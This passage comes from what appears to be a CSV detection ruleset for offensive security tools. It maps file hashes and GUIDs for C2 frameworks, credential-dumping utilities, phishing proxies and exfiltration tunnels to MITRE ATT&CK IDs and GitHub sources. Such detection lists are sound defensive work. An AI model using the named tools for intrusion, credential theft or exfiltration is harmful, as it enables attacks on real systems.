- TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f5028addc30229d68561491b4609ddfe0b908547cf31af3b810177d14c95645b*",".{0,1000}f5028addc30229d68561491b4609ddfe0b908547cf31af3b810177d14c95645b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*f504340404e40fea29f2beb71c114ce3d310ca80631aff7c0f0c19198da897d4*",".{0,1000}f504340404e40fea29f2beb71c114ce3d310ca80631aff7c0f0c19198da897d4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f56888799e7efbcf2196e8f9dfa0d1adc97772ad6fee946cc59307d758a99e21*",".{0,1000}f56888799e7efbcf2196e8f9dfa0d1adc97772ad6fee946cc59307d758a99e21.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f56f11c598a47a0313a3f4e0929a45a6ed7529119189d7434fbe39721e190083*",".{0,1000}f56f11c598a47a0313a3f4e0929a45a6ed7529119189d7434fbe39721e190083.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*f57841b1ef43a21bf127babaf02f391fa0d174b618ccd10b7326b4d83089d78a*",".{0,1000}f57841b1ef43a21bf127babaf02f391fa0d174b618ccd10b7326b4d83089d78a.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*f579af445d7bae578d9848251bcfeb75f0947df511f68a595c902468fad39086*",".{0,1000}f579af445d7bae578d9848251bcfeb75f0947df511f68a595c902468fad39086.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f58d086ed47166b22d02ac004380311058c66aac51551a10b55d421578494f32*",".{0,1000}f58d086ed47166b22d02ac004380311058c66aac51551a10b55d421578494f32.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*f58eea2ad17ebbb4245ab1fa29aad1afcd8569ce4c460590438b2e88a16a5529*",".{0,1000}f58eea2ad17ebbb4245ab1fa29aad1afcd8569ce4c460590438b2e88a16a5529.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*f59e403b62053c785de7df979c5cb7b0f426cbeb*",".{0,1000}f59e403b62053c785de7df979c5cb7b0f426cbeb.{0,1000}","offensive_tool_keyword","godoh","godoh is a 
proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*f5a45c4aa478a7ba9b44654a929bddc2f6453cd8d6f37cd893dda47220ad9870*",".{0,1000}f5a45c4aa478a7ba9b44654a929bddc2f6453cd8d6f37cd893dda47220ad9870.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*f5a5a21ee3a7dfaddae81cae7ef2df852cbfa44fdba51dfa0678a1c2d9d91c36*",".{0,1000}f5a5a21ee3a7dfaddae81cae7ef2df852cbfa44fdba51dfa0678a1c2d9d91c36.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*F5BIG-Scanner.py*",".{0,1000}F5BIG\-Scanner\.py.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jiansiting/CVE-2020-5902","1","0","N/A","N/A","1","6","5","2020-07-07T02:03:40Z","2020-07-07T02:03:39Z" 
"*f5cc1aeedb6a3e4a927ba5c1029c6075b2b9be7cf517cfdd8277bb0b00b5a60e*",".{0,1000}f5cc1aeedb6a3e4a927ba5c1029c6075b2b9be7cf517cfdd8277bb0b00b5a60e.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*f5cf5d30d16f2e4cd6deba19cbe539655e2d3c14002e47a35ef30ff6b795e5da*",".{0,1000}f5cf5d30d16f2e4cd6deba19cbe539655e2d3c14002e47a35ef30ff6b795e5da.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f5da690a8c9d7656d49401f2b54b3582197b81f6554eda0dc0bd511995db095c*",".{0,1000}f5da690a8c9d7656d49401f2b54b3582197b81f6554eda0dc0bd511995db095c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f5e85e80a5eb0184e26a3339871e5a5d0d4db497395f91c8305c018c51040912*",".{0,1000}f5e85e80a5eb0184e26a3339871e5a5d0d4db497395f91c8305c018c51040912.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*f5ef714731d36549ad900a94888613cdcfdddaa07dfb4a56990b2326bfc4cac7*",".{0,1000}f5ef714731d36549ad900a94888613cdcfdddaa07dfb4a56990b2326bfc4cac7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f5efe627e03bc8128bc4a3a600774648f2bd9384fb8f146262ae6727133e8414*",".{0,1000}f5efe627e03bc8128bc4a3a600774648f2bd9384fb8f146262ae6727133e8414.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*F602DAFE-E8A2-4CB2-AF0E-656CD357D821*",".{0,1000}F602DAFE\-E8A2\-4CB2\-AF0E\-656CD357D821.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" 
"*F60C3246-D449-412B-A858-3B5E84494D1A*",".{0,1000}F60C3246\-D449\-412B\-A858\-3B5E84494D1A.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*F61EEB46-5352-4349-B880-E4A0B38EC0DB*",".{0,1000}F61EEB46\-5352\-4349\-B880\-E4A0B38EC0DB.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*f6324f8d7b34cbf7dd27366148d1a9923219187ea46c4d5c029ed3e37afd47bf*",".{0,1000}f6324f8d7b34cbf7dd27366148d1a9923219187ea46c4d5c029ed3e37afd47bf.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f639c47dde4c4e363129e6b9ca2610cc07c93265b5e47c773dcf54f5f4b08d7c*",".{0,1000}f639c47dde4c4e363129e6b9ca2610cc07c93265b5e47c773dcf54f5f4b08d7c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 
- T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*f688df8c4a60bbb34467b8ef179a51f06af68b9861fa848d591df9c316a0c974*",".{0,1000}f688df8c4a60bbb34467b8ef179a51f06af68b9861fa848d591df9c316a0c974.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f6898381e46e3d7b755f69c7e5dff72800a29a37ea707ec06c3c793437910dd4*",".{0,1000}f6898381e46e3d7b755f69c7e5dff72800a29a37ea707ec06c3c793437910dd4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f6955930082d6cb41401cd02d95e0f79bf44f92918adc18bdbd5aef7207625d1*",".{0,1000}f6955930082d6cb41401cd02d95e0f79bf44f92918adc18bdbd5aef7207625d1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f6bb09ea48d85445fb1295a7b93ead6700a17c8f839624871f4faf024e18e39f*",".{0,1000}f6bb09ea48d85445fb1295a7b93ead6700a17c8f839624871f4faf024e18e39f.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*f6e0cfff7d80e0673848a96bc1e667c2716dec682c4f61156f83b070b9da8b4e*",".{0,1000}f6e0cfff7d80e0673848a96bc1e667c2716dec682c4f61156f83b070b9da8b4e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f6e16eee3494ad168fa124552fba957ba8ddf8e7d96eedeef33f9e2afe1e9257*",".{0,1000}f6e16eee3494ad168fa124552fba957ba8ddf8e7d96eedeef33f9e2afe1e9257.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" 
"*f6e25a72071f1dcfc6f383a694cd1a8c1889560593abf02b45451c6c7a851aca*",".{0,1000}f6e25a72071f1dcfc6f383a694cd1a8c1889560593abf02b45451c6c7a851aca.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f6e3f58333eee37bb52f603b1c8f9aa73d16ec2051f6349284d0f09c8847bb60*",".{0,1000}f6e3f58333eee37bb52f603b1c8f9aa73d16ec2051f6349284d0f09c8847bb60.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f6efa1ba7a66dddb2a14a652d4f96f365c73e3b15f5f40822eefbff9fc46a57c*",".{0,1000}f6efa1ba7a66dddb2a14a652d4f96f365c73e3b15f5f40822eefbff9fc46a57c.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*f6f65c22bb7a4f263d745b83a959cc8b295eadbc9f458afb437b716ad3fac833*",".{0,1000}f6f65c22bb7a4f263d745b83a959cc8b295eadbc9f458afb437b716ad3fac833.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f6f865390750822cea504855053b4fe017001235f63f628f8433dab6f3b15582*",".{0,1000}f6f865390750822cea504855053b4fe017001235f63f628f8433dab6f3b15582.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f724f2ad9e30f001e16034efa68757a3baf31fe918a71722b529a53f71c3bac0*",".{0,1000}f724f2ad9e30f001e16034efa68757a3baf31fe918a71722b529a53f71c3bac0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f7267a8880e45961219a6204a3a8ae5fff31e495f3f930e487f80cf89850f16f*",".{0,1000}f7267a8880e45961219a6204a3a8ae5fff31e495f3f930e487f80cf89850f16f.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*f7353868e1e35feb2bbd3a1b478698217a4cd06679fdb5dc8cc90f5232caa94b*",".{0,1000}f7353868e1e35feb2bbd3a1b478698217a4cd06679fdb5dc8cc90f5232caa94b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*f745fdbab44bfd54a5997a5d8746a602eb3af30c10d3fd264edbc705a8bb6e2a*",".{0,1000}f745fdbab44bfd54a5997a5d8746a602eb3af30c10d3fd264edbc705a8bb6e2a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*F7581FB4-FAF5-4CD0-888A-B588F5BC69CD*",".{0,1000}F7581FB4\-FAF5\-4CD0\-888A\-B588F5BC69CD.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*f7685768c93c8405a525090484261be417913ca2bcfdcce9596856dc3b5c64e0*",".{0,1000}f7685768c93c8405a525090484261be417913ca2bcfdcce9596856dc3b5c64e0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f7851e5b0bca91e7ae15d879a7c5be4f63014c2c4b85bc756f6eddcf8c1eaa39*",".{0,1000}f7851e5b0bca91e7ae15d879a7c5be4f63014c2c4b85bc756f6eddcf8c1eaa39.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f7b0550a05c30a38b721f15f90e84f104a3f98e3e8db7af96e5a98e7b79ecc11*",".{0,1000}f7b0550a05c30a38b721f15f90e84f104a3f98e3e8db7af96e5a98e7b79ecc11.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*F80AEB33FC53F2C8D6313A6B20CD117739A71382C208702B43073D54C9ACA681*",".{0,1000}F80AEB33FC53F2C8D6313A6B20CD117739A71382C208702B43073D54C9ACA681.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*f80dcd0195952b3bed5899824560e51e26cde9ec9974acbf1751d3ba845e5232*",".{0,1000}f80dcd0195952b3bed5899824560e51e26cde9ec9974acbf1751d3ba845e5232.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" 